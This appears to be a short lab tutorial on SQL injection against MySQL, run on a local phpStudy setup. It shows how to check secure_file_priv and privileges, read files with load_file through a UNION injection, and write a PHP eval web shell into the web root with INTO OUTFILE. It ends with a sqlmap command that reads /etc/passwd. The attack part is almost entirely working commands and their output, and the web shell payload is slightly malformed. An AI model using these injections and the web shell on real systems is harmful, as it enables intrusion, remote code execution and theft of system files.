Conditions for reading and writing:
1.secure_file_priv 的值不能是null
2.知道读写的绝对路径
3.最好是高权限(root)
View the value of secure_file_priv
mysql> show global variables like '%secure%';
+------------------+------------------------------+
| Variable_name | Value |
+------------------+------------------------------+
| secure_auth | OFF |
| secure_file_priv | C:\phpStudy\PHPTutorial\WWW\ |
+------------------+------------------------------+
2 rows in set (0.00 sec)
You can open my.ini and write it in
secure_file_priv = 'C:\phpStudy\PHPTutorial\WWW '
View permissions
mysql> select * from admin where id = 1 union select 1,user(),3;
+------+----------------+----------+
| id | username | password |
+------+----------------+----------+
| 1 | admin | 123 |
| 1 | root@localhost | 3 |
+------+----------------+----------+
2 rows in set (0.00 sec)
Read file content
mysql> select * from admin where id = 1 union select 1,load_file("C:\\phpStudy\\PHPTutorial\\WWW\\1.txt"),3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | 123 |
| 1 | 11111 | 3 |
+------+----------+----------+
2 rows in set (0.00 sec)
Write file
mysql> select * from admin where id = 1 union select 1,"<?php @eval($_GET['x']; ?)>",3 into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\1.php';
Query OK, 2 rows affected (0.00 sec)
The execution is successful, and the 1.php we wrote is generated in this directory to
verify whether
sqlmap can be executed to read the file
- file -read usage is used to read local files
sqlmap.py -u "http://xxx/x?id=1" --file-read=/etc/passwd